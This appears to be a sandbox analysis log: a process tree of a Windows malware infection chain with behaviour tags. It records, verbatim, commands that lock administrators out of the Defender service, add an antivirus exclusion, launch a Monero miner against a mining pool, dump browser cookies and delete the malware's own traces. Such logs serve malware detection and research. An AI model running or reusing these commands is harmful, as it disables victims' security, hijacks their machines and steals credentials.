cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
13⤵
PID:7280

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
14⤵
PID:8128

C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
12⤵
PID:6784

C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
12⤵
PID:420

C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
12⤵
PID:1792

C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
12⤵
PID:6872

C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
12⤵
PID:7796

C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
12⤵
PID:2928

C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
12⤵
PID:7408

C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:2652

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Executes dropped EXE
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:584

C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2164

C:\Users\Admin\AppData\Roaming\CDB6.tmp.exe
"C:\Users\Admin\AppData\Roaming\CDB6.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1636

C:\Users\Admin\AppData\Roaming\CDB6.tmp.exe
"C:\Users\Admin\AppData\Roaming\CDB6.tmp.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3916

C:\Users\Admin\AppData\Roaming\CF6C.tmp.exe
"C:\Users\Admin\AppData\Roaming\CF6C.tmp.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1540

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\CF6C.tmp.exe"
6⤵
PID:5756

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
7⤵
- Delays execution with timeout.exe
PID:5872

C:\Users\Admin\AppData\Local\Temp\8590c1ec..exe
"C:\Users\Admin\AppData\Local\Temp\8590c1ec..exe"
5⤵
PID:888

C:\Users\Admin\AppData\Local\Temp\8590c1ec..exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50
6⤵
- Executes dropped EXE
PID:5096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
5⤵
PID:1736

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:240

C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4720

C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
4⤵
PID:4516

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7728

C:\Users\Admin\AppData\Local\Temp\is-2OS74.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2OS74.tmp\vpn.tmp" /SL5="$201E8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\q1l1hs0cwu0\vpn.exe" /silent /subid=482
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
2⤵
PID:4880

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
3⤵
PID:5380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
2⤵
PID:200

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
3⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:5632

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4804

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5900

C:\Users\Admin\AppData\Local\Temp\is-2JHG0.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2JHG0.tmp\Setup3310.tmp" /SL5="$301FE,138429,56832,C:\Users\Admin\AppData\Local\Temp\r4ww53u0lsj\Setup3310.exe" /Verysilent /subid=577
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4524

C:\Users\Admin\AppData\Local\Temp\is-7EO9F.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-7EO9F.tmp\Setup.exe" /Verysilent
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4140

C:\Users\Admin\AppData\Local\Temp\is-QN58N.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QN58N.tmp\Setup.tmp" /SL5="$50236,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-7EO9F.tmp\Setup.exe" /Verysilent
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4844

C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\Delta.exe" /Verysilent
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5392

C:\Users\Admin\AppData\Local\Temp\is-I97AB.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-I97AB.tmp\Delta.tmp" /SL5="$10412,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\Delta.exe" /Verysilent
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5508

C:\Users\Admin\AppData\Local\Temp\is-IJ8QI.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-IJ8QI.tmp\Setup.exe" /VERYSILENT
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-IJ8QI.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:6140

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
8⤵
- Kills process with taskkill
PID:4556

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Delays execution with timeout.exe
PID:6012

C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\PictureLAb.exe" /Verysilent
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4536

C:\Users\Admin\AppData\Local\Temp\is-CJ4PR.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CJ4PR.tmp\PictureLAb.tmp" /SL5="$20366,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-HLI6I.tmp\PictureLAb.exe" /Verysilent
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4388

C:\Users\Admin\AppData\Local\Temp\is-INPRF.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-INPRF.tmp\Setup.exe" /VERYSILENT
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6080

C:\Users\Admin\AppData\Local\Temp\is-SBG6H.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SBG6H.tmp\Setup.tmp" /SL5="$3038C,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-INPRF.tmp\Setup.exe" /VERYSILENT
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4920

C:\Users\Admin\AppData\Local\Temp\is-7ESPB.tmp\HGT.exe
"C:\Users\Admin\AppData\Local\Temp\is-7ESPB.tmp\HGT.exe" /S /UID=lab214
8⤵
PID:6012

C:\Program Files\Common Files\WVWSNLBSQQ\prolab.exe
"C:\Program Files\Common Files\WVWSNLBSQQ\prolab.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5196

C:\Users\Admin\AppData\Local\Temp\is-S887L.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S887L.tmp\prolab.tmp" /SL5="$40420,575243,216576,C:\Program Files\Common Files\WVWSNLBSQQ\prolab.exe" /VERYSILENT
10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4888

C:\Users\Admin\AppData\Local\Temp\ad-310d0-3db-0c2a1-30471ccd69fb0\Popelalowi.exe
"C:\Users\Admin\AppData\Local\Temp\ad-310d0-3db-0c2a1-30471ccd69fb0\Popelalowi.exe"
9⤵
- Executes dropped EXE
PID:5548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fu1rix12.1oo\gaooo.exe & exit
10⤵
PID:6628

C:\Users\Admin\AppData\Local\Temp\fu1rix12.1oo\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\fu1rix12.1oo\gaooo.exe
11⤵
- Suspicious use of SetWindowsHookEx
PID:7616

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
- Suspicious use of SetWindowsHookEx
PID:7844

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
- Suspicious use of SetWindowsHookEx
PID:6304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5huzhvyw.hu3\md7_7dfj.exe & exit
10⤵
PID:4472

C:\Users\Admin\AppData\Local\Temp\5huzhvyw.hu3\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\5huzhvyw.hu3\md7_7dfj.exe
11⤵
- Suspicious use of SetWindowsHookEx
PID:4328

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gjs2vyne.u0i\askinstall29.exe & exit
10⤵
PID:4468

C:\Users\Admin\AppData\Local\Temp\gjs2vyne.u0i\askinstall29.exe
C:\Users\Admin\AppData\Local\Temp\gjs2vyne.u0i\askinstall29.exe
11⤵
- Suspicious use of SetWindowsHookEx
PID:6212

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
12⤵
PID:7752

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
13⤵
- Kills process with taskkill
PID:7988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iflb3oud.rj5\customer4.exe & exit
10⤵
PID:8100

C:\Users\Admin\AppData\Local\Temp\iflb3oud.rj5\customer4.exe
C:\Users\Admin\AppData\Local\Temp\iflb3oud.rj5\customer4.exe
11⤵
- Suspicious use of SetWindowsHookEx
PID:4592

C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
12⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6472

C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
parse.exe -f json -b edge
13⤵
PID:6456

C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
parse.exe -f json -b chrome
13⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1292

C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
parse.exe -f json -b firefox
13⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\irw4izst.nrr\HookSetp.exe & exit
10⤵
PID:192

C:\Users\Admin\AppData\Local\Temp\irw4izst.nrr\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\irw4izst.nrr\HookSetp.exe
11⤵
PID:6480

C:\ProgramData\2124834.23
"C:\ProgramData\2124834.23"
12⤵
PID:7872

C:\ProgramData\2311699.25
"C:\ProgramData\2311699.25"
12⤵
- Adds Run key to start application
PID:7984

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
13⤵
PID:6700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulsa111g.0xz\GcleanerWW.exe /mixone & exit
10⤵
PID:6392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exe & exit
10⤵
PID:6768

C:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exe
11⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:7672

C:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\0s2wxvdi.1ek\privacytools5.exe
12⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1bealidw.ldp\setup.exe /8-2222 & exit
10⤵
PID:7288

C:\Users\Admin\AppData\Local\Temp\1bealidw.ldp\setup.exe
C:\Users\Admin\AppData\Local\Temp\1bealidw.ldp\setup.exe /8-2222
11⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Fragrant-Forest"
12⤵
PID:5240

C:\Program Files (x86)\Fragrant-Forest\7za.exe
"C:\Program Files (x86)\Fragrant-Forest\7za.exe" e -p154.61.71.51 winamp-plugins.7z
12⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Fragrant-Forest\setup.exe" -map "C:\Program Files (x86)\Fragrant-Forest\WinmonProcessMonitor.sys""
12⤵
PID:5884

C:\Program Files (x86)\Fragrant-Forest\setup.exe
"C:\Program Files (x86)\Fragrant-Forest\setup.exe" -map "C:\Program Files (x86)\Fragrant-Forest\WinmonProcessMonitor.sys"
13⤵
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
PID:5916

C:\Program Files (x86)\Fragrant-Forest\7za.exe
"C:\Program Files (x86)\Fragrant-Forest\7za.exe" e -p154.61.71.51 winamp.7z
12⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:7308

C:\Program Files (x86)\Fragrant-Forest\setup.exe
"C:\Program Files (x86)\Fragrant-Forest\setup.exe" /8-2222
12⤵
PID:5108

C:\Program Files (x86)\Fragrant-Forest\setup.exe
"C:\Program Files (x86)\Fragrant-Forest\setup.exe" /8-2222
13⤵
- Modifies data under HKEY_USERS
PID:6292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zmg1sjbl.idw\MultitimerFour.exe & exit
10⤵
PID:7600

C:\Users\Admin\AppData\Local\Temp\zmg1sjbl.idw\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\zmg1sjbl.idw\MultitimerFour.exe
11⤵
PID:7840

C:\Users\Admin\AppData\Local\Temp\X0L9VLX3PA\setups.exe
"C:\Users\Admin\AppData\Local\Temp\X0L9VLX3PA\setups.exe" ll
12⤵
- Suspicious use of SetWindowsHookEx
PID:6072

C:\Users\Admin\AppData\Local\Temp\is-VOQ79.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VOQ79.tmp\setups.tmp" /SL5="$502D8,549376,61440,C:\Users\Admin\AppData\Local\Temp\X0L9VLX3PA\setups.exe" ll
13⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:7040

C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
12⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe" 1 3.1616095912.6053aaa8c5a39 104
13⤵
PID:5280

C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RBB0U1V76O\multitimer.exe" 2 3.1616095912.6053aaa8c5a39
14⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
PID:2228

C:\Users\Admin\AppData\Local\Temp\1lsitzqztgj\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\1lsitzqztgj\AwesomePoolU1.exe"
15⤵
PID:8096

C:\Users\Admin\AppData\Local\Temp\rowbsuvdsgc\vict.exe
"C:\Users\Admin\AppData\Local\Temp\rowbsuvdsgc\vict.exe" /VERYSILENT /id=535
15⤵
- Suspicious use of SetWindowsHookEx
PID:6492

C:\Users\Admin\AppData\Local\Temp\is-U8CCS.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U8CCS.tmp\vict.tmp" /SL5="$50292,870426,780800,C:\Users\Admin\AppData\Local\Temp\rowbsuvdsgc\vict.exe" /VERYSILENT /id=535
16⤵
- Loads dropped DLL
PID:7136

C:\Users\Admin\AppData\Local\Temp\is-GOPAJ.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-GOPAJ.tmp\wimapi.exe" 535
17⤵
PID:8188

C:\Users\Admin\AppData\Local\Temp\fjbgatmvui5\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\fjbgatmvui5\Setup3310.exe" /Verysilent /subid=577
15⤵
PID:8132

C:\Users\Admin\AppData\Local\Temp\is-J5HUV.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J5HUV.tmp\Setup3310.tmp" /SL5="$3027A,138429,56832,C:\Users\Admin\AppData\Local\Temp\fjbgatmvui5\Setup3310.exe" /Verysilent /subid=577
16⤵
- Loads dropped DLL
PID:5704

C:\Users\Admin\AppData\Local\Temp\is-IFF6U.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-IFF6U.tmp\Setup.exe" /Verysilent
17⤵
PID:6788

C:\Users\Admin\AppData\Local\Temp\is-D1P7F.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D1P7F.tmp\Setup.tmp" /SL5="$204B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IFF6U.tmp\Setup.exe" /Verysilent
18⤵
- Loads dropped DLL
PID:6844

C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\Delta.exe" /Verysilent
19⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\is-JVSL2.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JVSL2.tmp\Delta.tmp" /SL5="$202CE,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\Delta.exe" /Verysilent
20⤵
- Loads dropped DLL
PID:6848

C:\Users\Admin\AppData\Local\Temp\is-S2FN7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-S2FN7.tmp\Setup.exe" /VERYSILENT
21⤵
- Loads dropped DLL
- Checks processor information in registry
PID:8144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-S2FN7.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
22⤵
PID:7960

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
23⤵
- Kills process with taskkill
PID:7304

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
23⤵
- Delays execution with timeout.exe
PID:4824

C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\PictureLAb.exe" /Verysilent
19⤵
PID:6556

C:\Users\Admin\AppData\Local\Temp\is-RTBVR.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RTBVR.tmp\PictureLAb.tmp" /SL5="$302CE,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-HEM8M.tmp\PictureLAb.exe" /Verysilent
20⤵
- Loads dropped DLL
PID:3344

C:\Users\Admin\AppData\Local\Temp\is-2LCHJ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-2LCHJ.tmp\Setup.exe" /VERYSILENT
21⤵
PID:8140

C:\Users\Admin\AppData\Local\Temp\is-D974T.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D974T.tmp\Setup.tmp" /SL5="$204F6,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-2LCHJ.tmp\Setup.exe" /VERYSILENT
22⤵
PID:8048

C:\Users\Admin\AppData\Local\Temp\is-H535U.tmp\HGT.exe
"C:\Users\Admin\AppData\Local\Temp\is-H535U.tmp\HGT.exe" /S /UID=lab214
23⤵
- Drops file in Drivers directory
PID:5984

C:\Users\Admin\AppData\Local\Temp\8b-e441d-7e2-b6992-dc81742cdbcc7\Vulolozhoje.exe
"C:\Users\Admin\AppData\Local\Temp\8b-e441d-7e2-b6992-dc81742cdbcc7\Vulolozhoje.exe"
24⤵
PID:4084

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y13xwjdz.lak\gaooo.exe & exit
25⤵
PID:6992

C:\Users\Admin\AppData\Local\Temp\y13xwjdz.lak\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\y13xwjdz.lak\gaooo.exe
26⤵
PID:4744

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
27⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
27⤵
PID:8008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o03lfmrs.enf\md7_7dfj.exe & exit
25⤵
PID:5988

C:\Users\Admin\AppData\Local\Temp\o03lfmrs.enf\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\o03lfmrs.enf\md7_7dfj.exe
26⤵
- Checks whether UAC is enabled
PID:7192

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tw1ebwlk.5xj\askinstall29.exe & exit
25⤵
PID:7436

C:\Users\Admin\AppData\Local\Temp\tw1ebwlk.5xj\askinstall29.exe
C:\Users\Admin\AppData\Local\Temp\tw1ebwlk.5xj\askinstall29.exe
26⤵
PID:7540

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
27⤵
PID:7476

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
28⤵
- Kills process with taskkill
PID:5744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iilqxkbf.nua\customer4.exe & exit
25⤵
PID:3380

C:\Users\Admin\AppData\Local\Temp\iilqxkbf.nua\customer4.exe
C:\Users\Admin\AppData\Local\Temp\iilqxkbf.nua\customer4.exe
26⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
27⤵
PID:5540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2uz1tcu2.tho\HookSetp.exe & exit
25⤵
PID:8124

C:\Users\Admin\AppData\Local\Temp\2uz1tcu2.tho\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\2uz1tcu2.tho\HookSetp.exe
26⤵
PID:4360

C:\ProgramData\3094530.34
"C:\ProgramData\3094530.34"
27⤵
PID:7936

C:\ProgramData\7577180.83
"C:\ProgramData\7577180.83"
27⤵
- Suspicious behavior: SetClipboardViewer
PID:6860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yja1esig.ptf\GcleanerWW.exe /mixone & exit
25⤵
PID:7016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exe & exit
25⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exe
26⤵
- Suspicious use of SetThreadContext
PID:6988

C:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\3liwem5d.ise\privacytools5.exe
27⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\izczjqxw.frt\setup.exe /8-2222 & exit
25⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\izczjqxw.frt\setup.exe
C:\Users\Admin\AppData\Local\Temp\izczjqxw.frt\setup.exe /8-2222
26⤵
- Drops file in Program Files directory
PID:6736

